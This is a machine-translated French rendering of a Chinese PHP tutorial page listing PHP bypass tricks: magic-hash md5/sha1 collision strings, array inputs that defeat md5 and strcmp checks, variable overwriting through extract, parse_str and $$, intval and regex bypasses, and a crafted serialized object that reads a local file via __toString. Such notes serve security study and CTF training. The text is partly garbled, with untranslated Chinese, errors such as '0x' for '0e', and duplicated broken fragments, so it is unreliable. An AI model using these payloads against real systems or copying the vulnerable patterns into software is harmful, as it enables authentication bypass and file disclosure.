Maison >développement back-end >tutoriel php >Partager une collection de vulnérabilités dans les fonctions PHP
Lorsque PHP traite les chaînes de hachage, si vous utilisez "!=" ou "==" pour comparer les valeurs de hachage, il interprétera chaque valeur de hachage commençant par "0x" comme une notation scientifique 0 (est 0), donc si deux mots de passe différents sont hachés et leurs valeurs de hachage commencent par "0e", alors PHP pensera qu'elles sont identiques.
Les charges utiles courantes incluent
0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387a 0x02 sha1(str) sha1('aaroZmOk') sha1('aaK1STfY') sha1('aaO8zKZF') sha1('aa3OFF9m')
En même temps, MD5 ne peut pas gérer les tableaux Si les jugements suivants sont faits, les tableaux peuvent être utilisés pour contourner
if(@md5($_GET['a']) == @md5($_GET['b'])) { echo "yes"; } //http://127.0.0.1/1.php?a[]=1&b[]=2
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
Analyse de comparaison de chaînes
Ici, si $_GET['password'] est un tableau, la valeur de retour est NULL
Si c'est le cas 123 || asd || 12as || 123%00&&&**, la valeur de retour est vraie
Le reste est faux
N'oubliez pas que le programme peut également extraire la clé de la variable elle-même en tant que variable et la donner à la fonction pour traitement.
<?php print_r(@$_GET); foreach ($_GET AS $key => $value) { print $key."\n"; }?>
La fonction principale impliquée est la fonction d'extraction
<?php $auth = '0'; // 这里可以覆盖$auth的变量值 print_r($_GET); echo "</br>"; extract($_GET); if($auth == 1){ echo "private!"; } else{ echo "public!"; } ?>
extraire. peut recevoir un tableau, puis réaffecter la variable, la page de procédure est très simple.
En même temps ! La fonctionnalité $ de PHP peut être utilisée pour attribuer des noms de variables et peut également provoquer un écrasement de variables !
<?php $a='hi'; foreach($_GET as $key => $value) { echo $key."</br>".$value; $$key = $value; } print "</br>".$a;?>
Construire http://127.0.0.1:8080/test.php?a=12
pour atteindre l'objectif.
如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。 先将两个参数先转换成string类型。 当比较数组和字符串的时候,返回是0。 如果参数不是string类型,直接return
<?php $password=$_GET['password']; if (strcmp('xd',$password)) { echo 'NO!'; } else{ echo 'YES!'; }?>
Constructionhttp://127.0.0.1:8080/test.php?password[]=
Inutile de dire :
<?phpecho is_numeric(233333); # 1echo is_numeric('233333'); # 1echo is_numeric(0x233333); # 1echo is_numeric('0x233333'); # 1echo is_numeric('233333abc'); # 0?>
S'il n'y a aucune restriction sur le début et la fin de la chaîne lors de l'exécution d'une expression régulière correspondant à la fin (^ et $), il peut y avoir des problèmes de contournement
<?php$ip = 'asd 1.1.1.1 abcd'; // 可以绕过if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) { die('error'); } else { echo('key...'); }?>
Les fonctions similaires à parse_str() sont également mb_parse_str( ), parse_str analyse la chaîne en plusieurs variables. Si le paramètre str est la chaîne de requête transmise par l'URL, elle est analysée en variable et définie sur la portée actuelle.
Un type de couverture variable dans le temps
<?php $var='init'; print $var."</br>"; parse_str($_SERVER['QUERY_STRING']); echo $_SERVER['QUERY_STRING']."</br>"; print $var;?>
<?php echo 0 == 'a' ;// a 转换为数字为 0 重点注意 // 0x 开头会被当成16进制54975581388的16进制为 0xccccccccc // 十六进制与整数,被转换为同一进制比较 '0xccccccccc' == '54975581388' ; // 字符串在与数字比较前会自动转换为数字,如果不能转换为数字会变成0 1 == '1'; 1 == '01'; 10 == '1e1'; '100' == '1e2' ; // 十六进制数与带空格十六进制数,被转换为十六进制整数 '0xABCdef' == ' 0xABCdef'; echo '0010e2' == '1e3'; // 0e 开头会被当成数字,又是等于 0*10^xxx=0 // 如果 md5 是以 0e 开头,在做比较的时候,可以用这种方法绕过 '0e509367213418206700842008763514' == '0e481036490867661113260034900752'; '0e481036490867661113260034900752' == '0' ; var_dump(md5('240610708') == md5('QNKCDZO')); var_dump(md5('aabg7XSs') == md5('aabC9RqS')); var_dump(sha1('aaroZmOk') == sha1('aaK1STfY')); var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));?>
unset(bar); est utilisé pour détruire la variable spécifiée. Si la variable bar est incluse dans les paramètres de la requête, certaines variables peuvent être détruites pour contourner la logique du programme.
<?php $_CONFIG['extraSecure'] = true;foreach(array('_GET','_POST') as $method) { foreach($$method as $key=>$value) { // $key == _CONFIG // $$key == $_CONFIG // 这个函数会把 $_CONFIG 变量销毁 unset($$key); } }if ($_CONFIG['extraSecure'] == false) { echo 'flag {****}'; }?>
int en chaîne :
$var = 5; 方式1:$item = (string)$var; 方式2:$item = strval($var);
chaîne en int : fonction intval().
var_dump(intval('2')) //2 var_dump(intval('3abcd')) //3 var_dump(intval('abcd')) //0 可以使用字符串-0转换,来自于wechall的方法
Explique que lors de la conversion de intval(), il sera converti depuis le début de la chaîne jusqu'à ce qu'il rencontre un caractère non numérique. Même si une chaîne qui ne peut pas être convertie apparaît, intval() ne signalera pas d'erreur mais retournera 0
Au fait, intval peut être tronqué de %00
if($req['number']!=strval(intval($req['number']))){ $info = "number must be equal to it's integer!! "; }
Si $req['number ']= 0%00 peut contourner le jugement de
Si switch est un cas de type numérique, switch convertira les paramètres en type int , l'effet est équivalent à la fonction intval. Comme suit :
<?php $i ="abc"; switch ($i) { case 0: case 1: case 2: echo "i is less than 3 but not negative"; break; case 3: echo "i is 3"; } ?>
$array=[0,1,2,'3']; var_dump(in_array('abc', $array)); //true var_dump(in_array('1bc', $array)); //true
Entrez la chaîne à n'importe quel endroit où PHP la considère comme int, il sera obligé de convert
这里我们先简单介绍一下php中的魔术方法(这里如果对于类、对象、方法不熟的先去学学吧),即Magic方法,php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct,__toString,__sleep,__wakeup等等。这些函数都会在某些特殊时候被自动调用。 例如__construct()方法会在一个对象被创建时自动调用,对应的__destruct则会在一个对象被销毁时调用等等。 这里有两个比较特别的Magic方法,__sleep 方法会在一个对象被序列化的时候调用。 __wakeup方法会在一个对象被反序列化的时候调用。
<?phpclass test{ public $username = ''; public $password = ''; public $file = ''; public function out(){ echo "username: ".$this->username."<br>"."password: ".$this->password ; } public function __toString() { return file_get_contents($this->file); } }$a = new test();$a->file = 'C:\Users\YZ\Desktop\plan.txt';echo serialize($a);?>//tostring方法会在输出实例的时候执行,如果实例路径是隐秘文件就可以读取了
echo unserialize déclenche la fonction __tostring, et le fichier C:UsersYZDesktopplan.txt peut être lu ci-dessous
<?phpclass test{ public $username = ''; public $password = ''; public $file = ''; public function out(){ echo "username: ".$this->username."<br>"."password: ".$this->password ; } public function __toString() { return file_get_contents($this->file); } }$a = 'O:4:"test":3:{s:8:"username";s:0:"";s:8:"password";s:0:"";s:4:"file";s:28:"C:\Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>
La raison principale est
ini_set('session.serialize_handler', 'php_serialize'); (' session.serialize_handler', 'php');
Les deux gèrent les sessions différemment
UsersYZDesktopplan.txt";}';echo unserialize($a);?>
ini_set('session.serialize_handler', 'php_serialize'); , 'php');
Les deux gèrent les sessions différemment
Recommandations associées :
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!